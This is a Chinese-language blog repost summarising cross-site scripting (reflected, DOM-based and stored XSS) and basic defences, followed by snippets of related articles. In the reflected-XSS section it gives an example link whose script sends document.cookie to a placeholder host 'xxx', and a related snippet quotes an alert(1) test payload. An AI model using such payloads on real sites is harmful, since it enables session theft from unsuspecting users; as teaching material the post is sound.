XSS攻击总结

最新推荐文章于 2023-02-27 17:35:53 发布
最新推荐文章于 2023-02-27 17:35:53 发布
阅读量103 收藏
点赞数
文章标签: 数据库
原文链接:http://www.cnblogs.com/yanze/p/7562001.html
版权

本文由 http://www.cnblogs.com/phpstudy2015-6/p/6767032.html 整理总结而来

XSS又称CSS(cross site script),译为跨站脚本攻击,是web程序中常见的漏洞。

原理:

攻击者向有XSS漏洞的网站输入恶意代码(耗时间),当用户浏览该网站时(被动),此代码自动执行,从而攻击。

多用于盗取cookie、破坏页面结构、重定向。

优点:

几乎所有网站都有

缺点: 

1.耗时间

2.有一定的几率不成功

3.没有软件来实现自动化攻击

4.属于客户端的攻击方式

5.手法被动

6.对website有http-only、crossdomian.xml没有用(无法获取cookie)

 

攻击点:

类似于SQL注入攻击,理论上:所有可输入的地方,如果没有对输入数据进行处理,都存在XSS漏洞。

反射型

又称为非持久型,是最常见的XSS,原理是攻击者将注入的数据反映在响应中,因为这输入-->反馈的过程,因此称之为反射。最典型的就是一个包含XSS攻击的链接。

例如: http://www.amazon.cn/search?name=<script>document.location='http://xxx/get?cookie='+document.cookie</script>就把cookie偷走了

DOM Based XSS

从效果上来说也能称之为反射型。但其触发条件限制为: 用户可以通过交互修改浏览器的dom

前提是页面通过不安全的方式从document.location或document.URL或document.referer获取数据

注意:

1.恶意程序脚本在任何时候不会嵌入自然状态下的html页面

2.只有在浏览器没有修改URL字符时起作用,因为当url不是从地址栏输入,chrome、firefox等浏览器会自动转换document.url中的字符(例如<、>),一些老旧浏览器,例如IE6,则不会,因此很容易被攻击。

持久型

又称存储型,顾名思义,XSS攻击代码存储于数据库中,而前两种存于内存中,每次当用户打开此网页时便会执行,相比于前两者危害更大,常用语留言板,每次当用户查看留言信息时即触发。

 

解决方案:

过滤和编码

1.将重要的cookie标记为http only,这样document.cookie就不能获取cookie

2.表单数据规定类型,例如年龄为int、name为字母数字组合

3.对数据进行编码处理

4.移除特殊html标签,例如script、iframe

5.过滤js事件

转载于:https://www.cnblogs.com/yanze/p/7562001.html

weixin_30708329
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
防止XSS攻击解决办法
01-20
防止XSS攻击是保护Web应用安全的重要一环,对于任何Web开发者来说都是必备的知识。 一、XSS攻击类型 XSS攻击主要分为三类:反射型XSS、存储型XSS和DOM型XSS。 1. 反射型XSS:攻击者通过构造恶意链接,诱使用户点击...
XSS攻击进阶篇.zip
09-27
**总结来说,XSS攻击是一种利用Web应用漏洞的攻击方式,通过注入恶意脚本影响用户浏览器,可能导致各种安全问题。了解其原理和防御措施是网络安全中的重要一环,对于开发者和安全研究人员来说,持续学习和掌握XSS...
【原创】XSS攻击总结
yiran1919的博客
11-26 1406
一、XSS定义 xss的形成原理 xss 中文名是“跨站脚本攻击”,英文名“Cross Site Scripting”。 Cross-site scripting的英文首字母缩写本应为CSS,但因为CSS在网页设计领域已经被广泛指层叠样式表(Cascading Style Sheets),所以将Cross(意为“交叉”)改以交叉形的X做为缩写。其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的脚本代码(HTML、JavaScript),当其它用户访问含有恶意代码的页面,恶意脚本就会被浏览器解析执行
关于XSS攻击的一些总结
独酌101112的博客
07-11 432
昨晚面试第一个问题就被问到了项目中登录界面的XSS和CSRF攻击,与以往面试不同,感觉这次更偏重于实战,今天研究一下这方面的内容,面经是不敢写了,我怕再收到律师函(狗头保命) 含义:CSS即跨站脚本(Cross Site Scripting)曾经简称CSS,但是为了和层叠样式表(Cascading Style Sheets),也就是前端三大元素之一的CSS区别,因此被称为XSS。具体描述见XSS概述 原理:总所周知,HTML是一种超文本标记语言,作为前端语言的“骨”,通过将一些字符特殊地对待来区别文本和标
关于xss攻击学习的总结
weixin_30532759的博客
06-01 432
关于xss攻击,网上相关的介绍很多,一搜索也是一大堆,这里我就对自己感兴趣的一些内容做个总结。 xss简单介绍 成因:xss是将恶意代码(多是JavaScript)插入html代码中。 分类: 1、 反射型 2、 存储型 3、 DOM型 1、 XSS的危害是这么? 攻击者构造可执行JavaScript的攻击链接,发送给受害者,多用于获取cookie,因为cooki...
跨站脚本攻击XSS总结
零落的尘土
12-26 200
跨站脚本攻击 Cross Site Script,因为和CSS重名,所以改名XSS XSS简介 通常指黑客通过“HTML注入”纂改了页面,插入了恶意的脚本,从而在用户浏览页面时,控制用户浏览器的一种攻击。在一开始,这种攻击的演示案例是跨域的,所以叫“跨站脚本”。但是发展到今天,由于Javascript的强大功能以及网站前端应用的复杂化,是否跨域已经不再重要。但是由于历史原因,这个名字保留了下...
springmvc4配置防止XSS攻击的方法
04-05
总结来说,Spring MVC通过配置自定义过滤器来防止XSS攻击,是目前广泛采用的一种有效策略。同时,对于SQL注入的防范需要开发者在编写代码时提高警惕,确保每一步操作都不会为恶意攻击者打开方便之门。实现安全防护的...
防止xss网络攻击.zip
08-12
XSS(Cross-Site Scripting)攻击是一种常见的网络...总结来说,XSS攻击是Web安全领域的一大威胁,需要开发者和用户共同警惕。通过理解和实施有效的防御策略,我们可以大大降低XSS攻击带来的风险,保护用户的数据安全。
XSS与CSRF两种跨站攻击总结
02-26
在那个年代,大家一般用拼接字符串的方式...但最近又听说了另一种跨站攻击CSRF,于是找了些资料了解了一下,并与XSS放在一起做个比较。XSS全称“跨站脚本”,是注入攻击的一种。其特点是不对服务器端造成任何伤害,而是
XSS攻击与防范小结
令狐冲的专栏
02-22 251
这篇博客的提纲如下: 一、故障梳理 二、故障解决方案 三、XSS小结     一、故障梳理 这要从最近出的一个故障说起。故障的过程大致如下:   A系统与B系统域名不同,A系统中的数据提交到A系统某个form表单,然后通过js函数提交到B系统后台,然后显示在B系统的IE浏览器上 这是整个数据流。   其中IE8开始,IE内置了XSS filter机制,当来源为跨站数...
xss攻击总结
weixin_40222803的博客
07-09 681
xss攻击可以分成两种类型:非持久型xss攻击:顾名思义,非持久型xss攻击是一次性的,仅对当次的页面访问产生影响。非持久型xss攻击要求用户访问一个被攻击者篡改后的链接,用户访问该链接时,被植入的攻击脚本被用户游览器执行,从而达到攻击目的。持久型xss攻击:持久型xss,会把攻击者的数据存储在服务器端,攻击行为将伴随着攻击数据一直存在。可以分为三类:反射型:经过后端,不经过数据库存储型:经过后端...
XSS总结
weixin_43263451的博客
08-03 748
XSS总结简介跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。 分类反射型XSS反射型只是简单的将用户输入的数据”反射”给浏览器,...
xss攻击小结
anma5413的博客
01-06 286
上周初步学习了xss的类型、攻击方法原理和防御措施,并对其做了个简单的总结。 那么这周就以dvwa来总结一下简单的xss攻击。 low级别: 查看源代码可以看到,并没有对参数做任何的处理过滤,所以直接输入带有xss攻击的代码就可以弹窗,比如<script>alert(1)</script>: Medium级别: ...
web安全-XSS攻击点汇总
Coisini的博客
05-27 255
xss漏洞知识总结
ma963852的博客
04-14 5658
漏洞原理 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。 未对用户的输入进行处理,浏览器将用户输入的内容当作脚本执行。恶意攻击者往Web页面里插入恶意JS代码,当用户浏览该页之时,嵌入其中Web里面的JS代码会被执行,从而达到恶意的特殊目的。是一种针对用户浏览器的攻击。 漏洞分类 Xss主要分为三种类型: (1)反射型 反射型xss又称非持久性xss,需要用户点击带有
XSS知识总结
qq_43842093的博客
11-07 6801
XSS基础 跨站脚本(英语:Cross-site scripting,通常简称为:XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至
xss总结
Lkyqj的博客
07-30 811
xss跨站脚本攻击,(CrossSiteScripting),为区别层叠样式表(CascadingStyleSheets,CSS),所以改写为XSS类型一反射型特点1非持久型,不保存到正常的服务器数据库在中2反射型xss的被攻击对象是特定的,使用含有反射型xss的特质url类型二储存型特点1持久型,攻击脚本将被永久的存放在目标服务器的数据库或文件中,具有很高的隐蔽性2储存型xss非特定攻击用户,攻击者将存储型xss代码写进有xss的网站上后,只要有访问这个连接就会被攻击。...
网络安全———XSS漏洞综述
最新发布
VN520的博客
02-27 837
XSS(也称为跨站脚本攻击)是一个web安全漏洞,它允许攻击者破坏用户与易受攻击的应用程序的交互。它允许攻击者绕过隔离不同网站的同源策略。跨站点脚本漏洞通常允许攻击者伪装成受害用户,执行用户能够执行的任何操作,并访问用户的任何数据。如果受害用户在应用程序中拥有最高权限,那么攻击者就可能获得对所有应用程序功能和数据的完全控制。
XSS攻击:篡改网页链接的实战教程
总结来说,这一节着重讲解了XSS攻击中的链接篡改技术,包括利用`window.onload`事件、反射型XSS、定向流量和恶意脚本注入等手段,以期提高防御者对这种常见Web攻击的理解和防范能力。在学习和实践中,务必重视对这类...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值